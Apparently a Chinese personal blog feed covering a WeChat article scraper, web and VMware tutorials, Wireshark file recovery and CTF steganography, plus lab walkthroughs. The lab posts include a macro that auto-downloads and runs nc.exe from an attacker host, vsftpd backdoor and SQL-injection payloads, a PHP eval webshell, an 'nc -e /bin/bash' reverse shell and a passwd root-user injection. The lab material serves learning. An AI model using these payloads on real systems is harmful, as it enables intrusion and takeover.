近日得到一任务:需要爬取某个公众号的文章并保存到本地,然后进行分析。那么对于公众号爬取确实是比较少见而且有点难度,在搜集资料后,结合网络文章的经验以及自己的改进,实现了这一功能。参考文章会在文末列出。
由于公众号的每一篇文章的链接似乎是随机生成的,相互之间没有关联,因此要批量获取某公众号的文章链接需要用到一定的方法,搜狗微信只能获取到最近的几篇文章,并不能做到全部收录。这里就需要用到自己的微信公众号的后台了。
登录微信公众平台,新建文章,点击超链接。此时打开浏览器的检查模式,选择网络(Network)
,然后在窗口中选择你要爬取的公众号。
这时我们可以看到,网络
中出现了一个“appmsg
”开头的内容,这就是我们需要的目标。将它的请求URL记录在下面(*隐去了部分内容):
1 | https://mp.weixin.qq.com/cgi-bin/appmsg?action=list_ex&begin=0&count=5&fakeid=MzI2********Mw==&type=9&query=&token=465***914lang=zh_CN&f=json&ajax=1 |
该链接分为三部分:
https://mp.weixin.qq.com/cgi-bin/appmsg
请求的基础部分?action=list_ex
常用于动态网站,实现不同的参数值而生成不同的页面或者返回不同的结果&begin=0&count=5&fakeid=MzI2MTE0NTE3Mw==&type=9&query=&token=465219914&lang=zh_CN&f=json&ajax=1
设置各种参数,我们需要的就是用到这里的fakeid=MzI2********Mw==
以及token=465***914
在python运行时,我们需要它能以登录的状态去访问该URL。因此需要找到我们浏览器保存的Cookie和User-Agent:
开浏览器的检查模式,选择文档(Document)
。此时刷新网页,就可以看到一个“home
”开头的内容:
从这里我们可以获得Cookie和User-Agent参数。
将上述四个参数保存至一个wechat.yaml
文件中,方便后面在python中加载。
文件内容:
1 | cookie : RK=P/Pd1qTtZk; ptcz...... |
这部分主要参考了@Author:YuFanWenShu的代码:
1 | import json |
经测试,每爬取大约200篇文章会遇到流量限制,此时需要等待一小时左右。一个账号一天最多只能爬取1000篇左右,我在这里测试的时候,是在大约1200篇的时候停下了,可能需要一天甚至更长的时间才能继续…
使用pdfkit
将文章转为PDF,可能需要安装:
1 | pip install pdfkit |
还需要安装一个工具:wkhtmltopdf下载链接
1 | import csv |
这一步有很多奇怪的问题,比如如果原文中有仿宋字体的话,在转成PDF后全部都不能正常显示。于是在转为PDF之前将HTML中的所有仿宋全部替换为默认字体。
这一部分还有诸多问题没有解决,但目前小部分的转换应该没有太大问题。偶尔还会遇到一些报错,暂时也还没有解决。如果各位大佬有办法,欢迎在评论区留言!
]]>我的主页ANINEGの小屋模板是使用的来自https://html5up.net的免费模板,以下是网页的介绍:
有需要的同学们可以去自行下载。
在原有模板的基础上,我增添了如下功能:
以下是实现过程:
1 | <script> |
实际上,该模板的入场动画大概耗费3秒左右,因此需要10秒自动跳转的效果就需要将预设调为13秒。
在预加载部分,在倒计时开始时,使用JavaScript动态创建一个<iframe>
元素,并将需要预加载的页面设置为该<iframe>
的src
属性。这样,浏览器就会在倒计时期间开始预加载该页面,从而提高用户体验。
接着,我们创建了一个计时器,每秒减少计数器变量count
的值,并更新页面上的倒计时数字。当count
的值减少到0时,清除计时器并跳转到下一个页面。最后,在页面上添加了一个事件监听器,当用户单击页面上的任何位置时,清除计时器,停止倒计时。
最后,我们在页面中添加了一个<p>
元素,并将其id
属性设置为"countdown-text"
,用于显示倒计时提示或替换后的新文本。在计时器停止时,我们使用JavaScript修改了该元素的文本内容,将倒计时提示替换为需要显示的新文本。同时在单击事件监听器中补充添加了一行代码,用于在停止计时器时替换倒计时提示为“欢迎访问”文本。这样,无论是计时器正常结束还是被单击事件停止,都会显示“欢迎访问”文本。
很久没有更新啦,自从12月新冠开始再加上过年和开学考试再加上亿点点的划水,不知不觉就过去这么久了。那么今天刚好开完了社团的分享会,也一起在这里更新一下内容,也算是作为这次分享的记录了。
Office宏,译自英文单词Macro。宏是Office自带的一种高级脚本特性,通过VBA代码,可以在Office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。
Visual Basic for Applications(VBA)是Visual Basic的一种宏语言,是微软开发出来在其桌面应用程序中执行通用的自动化(OLE)任务的编程语言。主要能用来扩展Windows的应用程序功能,特别是Microsoft Office软件,也可说是一种应用程式视觉化的Basic 脚本。
我们创建一个启用宏的excel表格,例如值日名单.xlsm
。
点击视图
-宏
-查看宏
,在这里创建一个AutoOpen
在弹出的VBA中,修改为如下代码,点击运行,即可弹出计算器。
1 | Sub AutoOpen() |
原理其实就是在shell中输入calc
,启动计算器。
在左侧ThisWorkbook
中添加如下代码:
1 | Private Sub Workbook_Open() |
可以令excel在启动时自动运行AutoOpen
以火狐浏览器为例:
代码如下,其中
firefoxPath
是指火狐浏览器的安装路径。
websiteURL
是指要打开的网页。
--kiosk
是指定浏览器全屏模式启动,也可以修改为-url
以普通模式启动。
1 | Sub AutoOpen() |
在KALI(IP:192.168.80.128) 中生成nc.exe
,具体过程不再详细叙述,给出命令行如下:
1 | cd /var/www/html |
现在在/var/www/html
路径下有nc.exe
文件,我们需要它能够在Windows上被下载,所以我们启动web服务:
1 | systemctl start apache2.service |
如果此时在Windows浏览器中打开:http://192.168.80.128/nc.exe
,文件就可以被下载了。
回到Excel中,修改代码如下:
原理同上,就是使用curl
帮我们下载文件,然后在cmd中直接运行。
1 | Sub AutoOpen() |
与此同时,在KALI上需要开启监听:
1 | msfconsole |
这样,当Excel表格在启动时就会自动连接至攻击机,渗透完成。
当然,对nc.exe
做一下免杀效果会更好,如果以后有机会我会在这里继续更新一下,
本测试仅作学习原理探究,严禁去做违法的事情!
]]>最近在网上发现了一个挺有意思的项目onedrive-vercel-index,它可以在Vercel上部署一个属于你自己的网盘。那么相比于百度网盘,你对他有着很高的控制权,并不需要担心你的资源会被河蟹。那么至于网速,Onedrive给的带宽不太稳定,有时可以跑到满速,有时只有3MB/s,但怎么说也比某度网盘良心多了。
但这个网盘最大的缺点就在于空间上。现在注册Onedrive默认是5GB的空间,这显然不够用。但是也并非没有办法,我们在某宝上花个大概三块钱就可以把一个账号的空间永久提升至15GB。当然,如果你是购买了office365的话,那你就可以拿到1T的容量,就不需要担心什么容量的问题。网上还有一种教育版的,容量为1-5T,但是我不建议大家使用,因为这个账号的管理员可以看到你的文件,大家应该都知道数据的重要性,所以不要贪便宜使用这种。
最后一个问题,Vercel给你提供默认的域名大概率由于某些原因无法访问,所以你还需要拥有一个自己的域名,并把它解析到Vercel上。购买一个域名其实并不贵,如果是新用户就会更便宜了。例如.space
.top
.asia
这类,新用户只需要个位数就能拿下一年,甚至在搞活动的时候一块钱就能拿下一个.cn
域名。一个域名可以解析到很多服务器,对于已经有域名的同学来说,这个成本直接忽略不计。
因此,与我个人而言,搭建这个基本上是不需要成本的,只是需要花费那么一丢丢的时间。但是对于刚上手的同学们来说,需要那么一点点的开销,但相对于某度会员或者是他们卖的那种“24小时高速下载券”来说并不多。
打开 onedrive-vercel-index 的项目地址并 Fork 到自己的账号中。
打开项目中的/config/site.config.js,这个就是你的网盘的配置文件了,按照提示进行修改。
1 | /** |
然后打开 Vercel 官网注册登录,然后点 New Project
,然后 Import 你刚刚 Fork 的仓库。然后点击 Deploy,仓库就会自动开始部署,一两分钟以后就好了。接下来,打开 Marketplace 中的 Upstash,点击 Add Integration
,然后选中你的账户,再选中你部署的仓库。如果这时出现了一些选项,最好都填上勾上。等待 Upstash 创建 Redis 数据库。完成创建后,在项目的 Deployments
中将项目 Redeploy
。重新部署完成后,在Settings
-Domains
中填写你的域名并将其解析至Vercel后,即可访问部署好的网站。
打开网站,根据网站的引导进行操作即可。到这里,你就拥有了一个自己的网盘了!
当然,拿它来当图床,我想也是很不错的。
最后,放上我的网盘来给大家参考一下:
网盘链接:
]]>一个针对网络空间的搜索引擎
得益于科技的高速发展,现在接入互联网的设备五花八门。除了PC和服务器,还有路由器、物联网家电、平板电脑、手机等,甚至还有监控探头、工业控制中的SCADA系统等比较敏感的设备。这些设备被视作节点,共同组成了我们所处的的网络空间(Cyberspace)。
ZoomEye(“钟馗之眼”)网络空间搜索引擎正是一个检索网络空间节点的搜索引擎。通过后端的分布式爬虫引擎(无论谁家的搜索引擎都是这样)对全球节点的分析,对每个节点的所拥有的特征进行判别,从而获得设备类型、固件版本、分布地点、开放端口服务等信息。
目前国内外的网络空间搜索引擎有 shodan、zoomeye、cnesys、fofa
Shodan是目前最为知名的黑客搜索引擎,它是由计算机程序员约翰·马瑟利(John Matherly)于 2009 年推出的,他在 2003 年就提出了搜索与 Internet 链接的设备的想法。发展至今已经变成搜索资源最全,搜索性能最强,TOP1 级别的网络资产搜索引擎。
Censys 是由密歇根大学的计算机科学家创立,帮助信息安全从业人员发现、监控和分析从互联网访问的设备的平台,Censys 能够扫描整个互联网,每天扫描 IPv4 地址空间,以搜索所有联网设备并收集相关的信息,并返回一份有关资源(如设备、网站和证书)配置和部署信息的总体报告。
FOFA是白帽汇推出的一款网络空间搜索引擎,它通过进行网络空间测绘,能够帮助研究人员或者企业迅速进行网络资产匹配,例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。
]]>在VMware中,虚拟机的网络连接主要是由VMware创建的虚拟交换机(也叫做虚拟网络)负责实现的,VMware可以根据需要创建多个虚拟网络。
在Windows系统的主机上,VMware最多可以创建20个虚拟网络,每个虚拟网络可以连接任意数量的虚拟机网络设备;在Linux系统的主机上,VMware最多可以创建255个虚拟网络,但每个虚拟网络仅能连接32个虚拟机网络设备。VMware的虚拟网络都是以"VMnet+数字"的形式来命名的,例如 VMnet0、VMnet1、VMnet2……以此类推(在Linux系统的主机上,虚拟网络的名称均采用小写形式,例如 vmnet0 )。
当我们安装VMware时,VMware会自动为3种网络连接模式各自创建1个虚拟机网络(如下图):VMnet0(桥接模式)、VMnet8(NAT模式)、VMnet1(仅主机模式)。此外,我们也可以根据需要自行创建更多的虚拟网络。
VMware桥接模式,也就是将虚拟机的虚拟网络适配器与主机的物理网络适配器进行交接,虚拟机中的虚拟网络适配器可通过主机中的物理网络适配器直接访问到外部网络。简而言之,这就好像在局域网中添加了一台新的、独立的计算机一样。因此,虚拟机也会占用局域网中的一个IP地址,并且可以和其他终端进行相互访问。
桥接模式网络连接支持有线和无线主机网络适配器。如果你想把虚拟机当做一台完全独立的计算机看待,并且允许它和其他终端一样的进行网络通信,那么桥接模式通常是虚拟机访问网络的最简单途径。
NAT,是Network Address Translation的缩写,意即网络地址转换。NAT模式也是VMware创建虚拟机的默认网络连接模式。使用NAT模式网络连接时,VMware会在主机上建立单独的专用网络,用以在主机和虚拟机之间相互通信。虚拟机向外部网络发送的请求数据"包裹",都会交由NAT网络适配器加上"特殊标记"并以主机的名义转发出去,外部网络返回的响应数据"包裹",也是先由主机接收,然后交由NAT网络适配器根据"特殊标记"进行识别并转发给对应的虚拟机,因此,虚拟机在外部网络中不必具有自己的IP地址。从外部网络来看,虚拟机和主机在共享一个IP地址,默认情况下,外部网络终端也无法访问到虚拟机。
此外,在一台主机上只允许有一个NAT模式的虚拟网络。因此,同一台主机上的多个采用NAT模式网络连接的虚拟机也是可以相互访问的。
仅主机模式,是一种比NAT模式更加封闭的的网络连接模式,它将创建完全包含在主机中的专用网络。仅主机模式的虚拟网络适配器仅对主机可见,并在虚拟机和主机系统之间提供网络连接。相对于NAT模式而言,仅主机模式不具备NAT功能,因此在默认情况下,使用仅主机模式网络连接的虚拟机无法连接到Internet(在主机上安装合适的路由或代理软件,或者在Windows系统的主机上使用Internet连接共享功能,仍然可以让虚拟机连接到Internet或其他网络)。
在同一台主机上可以创建多个仅主机模式的虚拟网络,如果多个虚拟机处于同一个仅主机模式网络中,那么它们之间是可以相互通信的;如果它们处于不同的仅主机模式网络,则默认情况下无法进行相互通信(可通过在它们之间设置路由器来实现相互通信)。
]]>TCP(Transmission Control Protocol,传输控制协议)是基于连接的协议,也就是说,在正式收发数据前,必须和对方建立可靠的连接。一个TCP连接必须要经过三次“对话”才能建立起来,其中的过程非常复杂,我们这里只做简单、形象的介绍,你只要做到能够理解这个过程即可。我们来看看这三次对话的简单过程:主机A向主机B发出连接请求数据包:“我想给你发数据,可以吗?”,这是第一次对话;主机B向主机A发送同意连接和要求同步(同步就是两台主机一个在发送,一个在接收,协调工作)的数据包:“可以,你什么时候发?”,这是第二次对话;主机A再发出一个数据包确认主机B的要求同步:“我现在就发,你接着吧!”,这是第三次对话。三次“对话”的目的是使数据包的发送和接收同步,经过三次“对话”之后,主机A才向主机B正式发送数据。
QQ的文件发送是怎样的过程呢?通常,发送文件的计算机首先要通过消息服务器将其IP地址发送给接收计算机,当接收计算机同意接收的确认消息反馈到消息服务器后,消息服务器将据此设置好文件传输对话。随即,发送计算机与接收计算机就会在确定好的端口范围内,建立起TCP或UDP连接开始文件的检索与传输。
在默认状态下,QQ优先采用了UDP(User Data Protocol,用户数据报协议)协议传送数据,而对可靠性要求高的数据通讯系统往往使用TCP协议传输数据。与TCP协议不同,UDP协议并不提供数据传送的验证机制——在整个文件传输过程中如果出现数据报的丢失,协议本身并不能作出任何的检测或提示。因此,通常人们把UDP协议称为不可靠的传输协议。 UDP协议适用于无须应答、要求时效的软件使用,这样的设计正好与QQ追求的目标相符,所以QQ优先使用了此协议进行一切功能应用。但是,由于UDP协议具有不可靠性,常会因种种原因导致消息或数据的发送失败(很多时候会发现发送文件给对方接收时,对方根本收不到要求接收文件的消息。或是发送聊天消息时,对方根本没有收到过消息)。显然,UDP协议由于排除了信息可靠传递机制,将安全和排序等功能移交给上层应用来完成,极大降低了执行时间,使速度得到了保证。QQ在数据传输上更注重实际性能,为了获得更好的使用效果,往往可以牺牲一定的可靠性。因此,使用QQ来传输数据,在很多时候就成了一个“不错”的选择。(来自互联网)
将手机与电脑连接至同一局域网中。
手机IP:192.168.31.216
电脑IP:192.168.31.182
启动WireShark,选择WLAN过滤器:
在过滤器中输入:ip.src == 192.168.31.216
以捕获/过滤指定ip地址(手机)数据包。
此时,我们在手机上发送一张图片给电脑,我们可以看到Wireshark捕获了大量数据包。其中这一项就是我们刚刚发送的图片:
右键,选择“追踪流=>TCP流”
数据格式选择“原始数据”,然后将其另存为新文件。
使用16进制编辑器(如WinHex)打开文件,找到jpg格式图片的文件头FF D8 FF
,并把文件头前面的数据删除:
保存后,将文件后缀改为.jpg
,至此,文件得以还原:
这是Metasploitable2(Linux)
Metasploitable是一个故意易受攻击的Linux虚拟机。此VM可用于进行安全培训、测试安全工具和实践常见的渗透测试技术。
默认登录名和密码为msfadmin:msfadmin。
切勿将此VM暴露于不受信任的网络(如果您有任何疑问,请使用NAT或仅主机模式)。
要联系开发者,请发送电子邮件至msfdev@metasploit.com
有关详细信息,请参阅以下URL:
名称 | Metasploitable2 |
---|---|
发布日期 | 2012年6月13日 |
作者 | rapid7user |
系列 | - |
网页 | https://sourceforge.net/projects/metasploitable/files/Metasploitable2/ |
靶机:Metasploitable2(IP:未知)
攻击机:KALI(IP:192.168.198.131)
平台:VMware 16.2.4
主机发现
arp-scan -l
使用 nmap 进行扫描主机
nmap -sS -Pn -A -p- -n 192.168.198.132
nmap -sV -p- 192.168.198.132
IP => 192.168.198.132
开放的端口:(真的是相当的多啊…)
PORT // STATE // SERVICE // VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
37649/tcp open mountd 1-3 (RPC #100005)
41732/tcp open java-rmi GNU Classpath grmiregistry
42063/tcp open status 1 (RPC #100024)
58117/tcp open nlockmgr 1-4 (RPC #100021)
我们可以看到在上方开放的端口中的21端口,版本号是“vsftpd 2.3.4”。对于这个版本,我们可以发现存在“笑脸漏洞后门”:
这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“
:)
”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有“:)
”,所以称笑脸漏洞。
ftp 192.168.198.132
随便起一个用户名,再用户名中加上笑脸符号:)
,密码随意。然后需要稍等片刻。完成后再对靶机端口进行扫描,会发现开启了一个6200端口:
nc 192.168.198.132 6200
直接获得root权限。
msfconsole
msf6 > search vsftpd
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.198.132
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
获取root权限成功。
更新中…
]]>破解渗透测试实验室:从 SQL 注入到 Shell VM
你好,朋友们!!今天,我们将解决另一个CTF挑战“从SQL注入到Shell I”。此 VM 由 Pentester Lab 开发。您可以从此处下载:https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell,80/
在 VM 软件中安装 iso 映像并启动它。本练习中给出的任务是访问管理控制台并上传 PHP Webshell。
水平
初学者
说明
本练习说明如何从 SQL 注入中获取对管理控制台的访问权限。然后在管理控制台中,了解如何在系统上运行命令。
你会学到什么?
- 使用 UNION 的 SQL 注入利用
- 破解 md5 散列密码
- 编写 PHP Webshell
名称 | PENTESTER LAB: FROM SQL INJECTION TO SHELL |
---|---|
发布日期 | 2012年9月13日 |
作者 | Pentester Lab |
系列 | Pentester Lab |
网页 | https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell,80/ |
靶机:My Awesome Photoblog(IP:192.168.3.108)
攻击机:KALI(IP:192.168.3.96)
平台:VMware 16.2.4
主机发现
arp-scan -l
使用nmap进行扫描主机
nmap -sS -Pn -A -p- -n 192.168.3.108
nmap -sV -p- 192.168.3.108
web指纹识别
whatweb -v 192.168.3.108
网站目录扫描
dirb http://192.168.3.108 /usr/share/dirb/wordlists/big.txt
查看html代码
访问http://192.168.3.108/
,Ctrl+U查看页面源代码:
发现代码中有cat.php?id=1
,疑似可以SQL注入。而admin/uploads/
则可能是文件上传的路径。
首先尝试登陆后台,这里介绍两种方法:
构造url:
192.168.3.108/cat.php?id=1 and 1=1#
页面正常显示
192.168.3.108/cat.php?id=1 and 1=2#
页面不正常显示:
结论:由此说明参数id存在sql注入。
192.168.3.108/cat.php?id=1 order by 1
192.168.3.108/cat.php?id=1 order by 2
…
192.168.3.108/cat.php?id=1 order by 5
此时发生报错:
则得知列数为4。
判断显示的列位:
192.168.3.108/cat.php?id=1 and 1=2 union select 1,2,3,4#
得知第二列为显示位。继续查询数据库名:
192.168.3.108/cat.php?id=1 and 1=2 union select 1,database(),3,4#
得知数据库名为 photoblog
192.168.3.108/cat.php?id=1 and 1=2 union select 1,table_name,3,4 from information_schema.tables#
发现有一个users表,可能是网站后台的账号密码。
192.168.3.108/cat.php?id=1 and 1=2 union select 1,column_name,3,4 from information_schema.columns where table_name = 'users'#
192.168.3.108/cat.php?id=1 and 1=2 union select 1,login,3,4 from users#
得到后台管理员用户名 :
admin
192.168.3.108/cat.php?id=1 and 1=2 union select 1,password,3,4 from users#
得到密文:
8efe310f9ab3efeae8d410a8e0166eb2
长度为32,猜测为md5加密,在cmd5网站解密:
得到密码:
P4ssw0rd
因为网页的标题是“My Awesome Photoblog”,可以猜测数据库名称为photoblog
(在方法一中证明)
使用sqlmap获取该数据库的全部数据:
sqlmap –u http://192.168.3.108/cat.php?id=1 –D photoblog --dump-all --batch
直接获得了账户名和登录密码:
接下来getshell,这里介绍两种方法:
构造一句话木马yijuhua.php
并上传, 发现提示不允许上传php。进行一下简单的文件上传绕过,修改后缀为.phP
,成功上传。
1 | eval($_POST['cmd']); PHP @ |
蚁剑连接:
成功getshell!
使用kali中的工具weevely,生成一个webshell文件:
weevely generate hacker shell.php
修改后缀为.phP
进行文件上传,然后使用weevely连接webshell:
weevely http://192.168.0.131/admin/uploads/shell.PHP hacker
成功连接。
]]>Tips:如有背景音乐自动播放,可以在左下角弹窗内关闭。
DC-4是另一个专门构建的易受攻击的实验室,旨在获得渗透测试领域的经验。
与以前的DC版本不同,此版本主要为初学者/中级版本而设计。只有一个标志,但从技术上讲,有多个入口点,就像上次一样,没有线索。
Linux技能和对Linux命令行的熟悉程度是必须的,基本的渗透测试工具的一些经验也是必须的。
对于初学者来说,Google可以提供很大的帮助,但你可以随时在@DCAU7上发推文给我,寻求帮助,让你再次前进。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。
名称 | DC- 4 |
---|---|
发布日期 | 2019年4月7日 |
作者 | DCAU |
系列 | DC |
网页 | https://www.vulnhub.com/entry/dc-4,313/ |
靶机:DC-4(IP:未知)
攻击机:KALI(IP:192.168.3.96)
平台:VMware 16.2.4
主机发现
arp-scan -l
使用nmap进行扫描主机
nmap -sS -Pn -A -p- -n 192.168.3.95
nmap -sV -p- 192.168.3.95
web指纹识别
whatweb -v 192.168.3.95
网站目录扫描
dirb http://192.168.3.95 /usr/share/dirb/wordlists/big.txt
靶机IP => 192.168.3.95
开放的端口:
尝试用hydra进行爆破
hydra -l root -P /root/top1000.txt -vV -t 10 -o ssh.txt 192.168.15.152 ssh -s 22
爆不出来,先去网页端看一看有什么有用的信息。
访问http://192.168.3.95/
打开网页,是一个登录界面,开始用BP进行爆破,得到密码:
happy
登录进入,发现有可以执行命令的地方:
使用BP进行抓包,发现可以修改命令:
先执行一个反弹shell的命令:nc -e /bin/bash 192.168.3.95 4444
执行之前现在kali上监听4444端口:nc -lnvp 4444
getshell成功:
进入交互模式,便于操作:python -c 'import pty;pty.spawn("/bin/sh")'
先搜刮一下目录:
查看jim用户下的backups,发现确实是密码的备份,cat打开进行查看,确实是密码。
看看其他文件,mbox访问被拒绝:
把密码copy到本地,用 hydra进行爆破:
hydra -l jim -P /home/kali/桌面/bak.txt ssh://192.168.3.95
得到密码:
jibril04
使用ssh远程登陆:
注意系统提示有新的邮件。
找到邮件,发现 charles用户交给 jim用户保管的密码:
得到用户名和密码:
charles
^xHhA&hvim0y
再次使用ssh远程登陆到charles :
查看用户权限发现,该用户可以以root权限免密码执行 /usr/bin/teehee
进行提权,直接向/etc/passwd中增加内容:
echo 命令与 sudo 命令配合使用,可以实现向那些只有系统管理员才有权限操作的文件中写入信息
添加一个 hack用户,并使用teehee执行写入passwd中
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
1 | 参数解释: |
得到flag:
]]>一是进入Word—文件—选项—显示—勾选“隐藏文字”。
二是使用WinHex查看十六进制数据。
我们可以将word文档转换成xml格式,当然反过来我们也可以将xml转换成word文档,这导致了我们如果重新打包为word文档的过程中,有可能被隐藏进其他数据。
一是将后缀名改为.zip\rar\7z等压缩格式,打开即可查看。
二是使用WinHex查看十六进制数据。
PDF文件隐写:
分离方法:
wbStego分离:
在工具目录中找到 wbStego4open,使用工具载入文档,
Step 1 是文件介绍
Step 2 中,我们选择Decode,
Step 3 我们选择目标文件
Step 4 输入加密密码,这里我是空密码,直接跳过
Step 5 为保存文件为 flag.txt
打开音频文件尝试听一下内容,会听到类似电报的发文声。
摩尔斯电码对照表:
解码方式:
用Adobe Auditon打开目标文件,并观察波形。长的代表代表横线,短的代表点,大的间隔是空格。
翻译后的密文为:
-..- .. .- -. --.. .... .. .-.-.- .- .-.. .. -.-- ..- -. .-.-.- -.-. --- --
MP3Stego命令:
加密:encode -E 加密文本 -P 密码 wav文件 mp3文件
解密:decode -X -P 密码 mp3文件
频谱是频率谱密度的简称,是频率的分布曲线。复杂振荡分解为振幅不同和频率不同的谐振荡,这些谐振荡的幅值按频率排列的图形叫做频谱。
在CTF中,我们可以单独只对一个声道中,隐写进信息。
分离方法:
使用Adobe Audition分离:
用AU打开音频文件,调整频谱显示,即可显示出flag。
目前在CTF赛事中较为常出现的视频隐写,一般都是将一场带有隐写信息的图片,嵌入视频中,我们所需要做的就是将这个图片从视频分离出来,然后在分析我们分离出来的文件是什么,之后的操作可能会涉及到密码编码,图片隐写等知识点。
如果单独对视频来说ffmpeg是一个很好的工具,这里我使用的是foremost,当然我们也可以使用binwalk或者dd等工具,正如我们图片隐写中教大家分离图片所用的方法一样。区别是,ffmpeg将视频分解成一张一张的图片,foremost是一个基于文件头和尾部信息以及文件的内建数据结构恢复文件的命令行工具。
分离命令:
foremost xxx.mp4
会自动生成output目录存放分离出文件。
分离命令:
steghide extract -sf thing.jpg -p password
JPEG/JPG:
PNG:
GIF:
BMP:
扩展名 | 文件头标识(HEX) | 文件描述 |
---|---|---|
123 | 00 00 1A 00 05 10 04 | Lotus 1-2-3 spreadsheet (v9) file |
3gg; 3gp; 3g2 | 00 00 00 nn 66 74 79 70 33 67 70 | 3rd Generation Partnership Project 3GPP (nn=0x14) and 3GPP2 (nn=0x20) multimedia files |
7z | 37 7A BC AF 27 1C | 7-ZIP compressed file |
aba | 00 01 42 41 | Palm Address Book Archive file |
abi | 41 4F 4C 49 4E 44 45 58 | AOL address book index file |
aby; idx | 41 4F 4C 44 42 | AOL database files: address book (ABY) and user configuration data (MAIN.IDX) |
accdb | 00 01 00 00 53 74 61 6E 64 61 72 64 20 41 43 45 20 44 42 | Microsoft Access 2007 file |
ACM | 4D 5A | MS audio compression manager driver |
ADF | 44 4F 53 | Amiga disk file |
adx | 03 00 00 00 41 50 50 52 | Lotus Approach ADX file |
AIFF | 46 4F 52 4D 00 | Audio Interchange File |
ain | 21 12 | AIN Compressed Archive File |
ami | 5B 76 65 72 5D | Lotus Ami Pro |
amr | 23 21 41 4D 52 | Adaptive Multi-Rate ACELP (Algebraic Code Excited Linear Prediction) Codec, commonly audio format with GSM cell phones |
ANI | 52 49 46 46 | |
API | 4D 5A 90 00 03 00 00 00 | Acrobat plug-in |
arc | 1A 0x | LH archive file, old version(where x = 0x2, 0x3, 0x4, 0x8 or 0x9 for types 1-5, respectively) |
arc | 41 72 43 01 | FreeArc compressed file |
arj | 60 EA | ARJ Compressed Archive |
ARJ | 60 EA 27 | |
ART | 4A 47 03 0E 00 00 00 | AOL ART file |
ART | 4A 47 04 0E 00 00 00 | AOL ART file |
asf | 30 26 B2 75 8E 66 CF 11 | Windows Media |
asf; wma; wmv | 30 26 B2 75 8E 66 CF 11 A6 D9 00 AA 00 62 CE 6C | Microsoft Windows Media Audio/Video File(Advanced Streaming Format) |
asx | 3C | Advanced Stream redirector file |
au | 2E 73 6E 64 | SoundMachine Audio FileNeXT/Sun Microsystems μ-Law audio file |
avi | 41 56 49 20 | Audio Video Interleave (AVI) |
AX | 4D 5A | Library cache file |
AX | 4D 5A 90 00 03 00 00 00 | DirectShow filter |
bag | 41 4F 4C 20 46 65 65 64 62 61 67 | AOL and AIM buddy list file |
BAS | 20 20 20 | |
bin | 42 4C 49 32 32 33 51 | Thomson Speedtouch series WLAN router firmware |
bmp | 42 4D | Windows Bitmap |
BMP | 42 4D 3E | |
bz; bz2 | 42 5A 68 | BZIP Archive |
BZ2; TAR.BZ2; TBZ2; TB2 | 42 5A 68 | bzip2 compressed archive |
CAB | 49 53 63 | |
CAB; HDR | 49 53 63 28 | Install Shield v5.x or 6.x compressed file |
CAB | 4D 53 43 46 | Microsoft CAB File Format |
cat | 30 | Microsoft security catalog file |
CBD | 43 42 46 49 4C 45 | WordPerfect dictionary file (unconfirmed) |
CCD | 5B 43 6C | |
cdr | CDR | Corel Draw |
CDR | 45 4C 49 54 45 20 43 6F 6D 6D 61 6E 64 65 72 20 | Elite Plus Commander saved game file |
CDR, DVF | 4D 53 5F 56 4F 49 43 45 | Sony Compressed Voice File |
CHI; CHM | 49 54 53 46 | Microsoft Compiled HTML Help File |
CHM | 49 54 53 | |
CLB | 43 4D 58 31 | Corel Binary metafile |
CLB | 43 4F 4D 2B | COM+ Catalog file |
cnt | 3A 42 61 73 65 | |
COM, DLL, DRV, EXE, PIF, QTS, QTX, SYS | 4D 5A | Windows/DOS executable file |
COM | 4D 5A EE | |
COM | E9 3B 03 | |
CPE | 46 41 58 43 4F 56 45 52 2D 56 45 52 | Microsoft Fax Cover Sheet |
CPL | 4D 5A | Control panel application |
CPT | 43 50 54 37 46 49 4C 45 | Corel Photopaint file |
CPT | 43 50 54 46 49 4C 45 | Corel Photopaint file |
CPX | 5B 57 69 | |
cru; crush | 43 52 55 53 48 | CRUSH Archive File |
CRU | 43 52 55 53 48 20 76 | Crush compressed archive |
CRW | 49 49 1A 00 00 00 48 45 41 50 43 43 44 52 02 00 | Canon digital camera RAW file |
CTF | 43 61 74 61 6C 6F 67 20 33 2E 30 30 00 | WhereIsIt Catalog file |
CUR | 00 00 02 00 01 00 20 20 | Windows cursor file |
dat | 03 | MapInfo Native Data Format |
dat | 1A 52 54 53 20 43 4F 4D 50 52 45 53 53 45 44 20 49 4D 41 47 45 20 56 31 2E 30 1A | Runtime Software disk image |
